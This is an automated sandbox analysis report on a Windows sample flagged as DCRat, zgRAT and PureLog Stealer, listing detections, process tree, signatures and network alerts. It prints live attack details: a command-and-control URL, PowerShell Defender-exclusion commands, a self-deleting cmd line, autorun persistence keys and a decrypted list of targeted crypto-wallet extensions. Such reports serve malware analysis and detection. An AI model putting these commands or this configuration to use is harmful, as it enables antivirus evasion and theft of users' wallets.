Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wh2c6sgwRo.exe

Overview

General Information

Sample name:Wh2c6sgwRo.exe
renamed because original name is a hash value
Original sample name:43d30c776f593efdf5416ab4142442d6.exe
Analysis ID:1572157
MD5:43d30c776f593efdf5416ab4142442d6
SHA1:3f7f251511aa918a3c221cb4d039e406e9449132
SHA256:aafd35488559a2ef64b3758eff767046369f540af491f9325d344c2ef214587a
Tags:exeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected UAC Bypass using CMSTP
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Wh2c6sgwRo.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Wh2c6sgwRo.exe" MD5: 43D30C776F593EFDF5416AB4142442D6)
    • d3yngi1q.wji.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
      • csc.exe (PID: 7952 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8012 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • csc.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8112 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 1568 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1796 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7920 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 2060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 3456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • PING.EXE (PID: 4940 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 7796 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7848 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • fontdrvhost.exe (PID: 3116 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 2352 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 8068 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • fontdrvhost.exe (PID: 2616 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 7976 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Wh2c6sgwRo.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Wh2c6sgwRo.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      Wh2c6sgwRo.exeMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x55d47:$s1: file:///
      • 0x55c33:$s2: {11111-22222-10009-11112}
      • 0x55cd7:$s3: {11111-22222-50001-00000}
      • 0x51524:$s4: get_Module
      • 0x51c04:$s5: Reverse
      • 0x4bace:$s6: BlockCopy
      • 0x5207c:$s7: ReadByte
      • 0x55d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              C:\ProgramData\fontdrvhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: Wh2c6sgwRo.exe PID: 7520JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                              • 0x55d47:$s1: file:///
                              • 0x55c33:$s2: {11111-22222-10009-11112}
                              • 0x55cd7:$s3: {11111-22222-50001-00000}
                              • 0x51524:$s4: get_Module
                              • 0x51c04:$s5: Reverse
                              • 0x4bace:$s6: BlockCopy
                              • 0x5207c:$s7: ReadByte
                              • 0x55d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                              2.0.d3yngi1q.wji.exe.cf0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Files With System Process Name In Unsuspected Locations
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetFilename: C:\Users\All Users\fontdrvhost.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\fontdrvhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost
                                Sigma detected: CurrentVersion NT Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\fontdrvhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", ProcessId: 7952, ProcessName: csc.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Sigma detected: Dynamic CSharp Compile Artefact
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe

                                Data Obfuscation

                                barindex
                                Sigma detected: Dot net compiler compiles file from suspicious location
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", ProcessId: 7952, ProcessName: csc.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-10T07:28:13.983208+010020480951A Network Trojan was detected192.168.2.849713147.45.47.15180TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-10T07:28:31.389464+010020481301A Network Trojan was detected192.168.2.849728147.45.47.15180TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: Wh2c6sgwRo.exeAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\ProgramData\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Found malware configuration
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\ProgramData\fontdrvhost.exeReversingLabs: Detection: 75%
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeReversingLabs: Detection: 75%
                                Source: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Multi AV Scanner detection for submitted file
                                Source: Wh2c6sgwRo.exeReversingLabs: Detection: 63%
                                Source: Wh2c6sgwRo.exeVirustotal: Detection: 77%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Machine Learning detection for dropped file
                                Source: C:\ProgramData\fontdrvhost.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: Wh2c6sgwRo.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: ["HNto09huzqp83QdVrE0WyHByCNs9y8zHCzvd9I2B0Kmuv3DiEv587qDAL4mmQh511h6Ef9VjMygoeRCJKK5DC0KWwvSFfPuSOv2O69DEZWwIJZf42dcGm2yBWkStrQD7","3e5e94f0e11171c3961d1e5f3808d36c9dca912cf9a303ebba50229f9f225d68","0","topv2dc","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
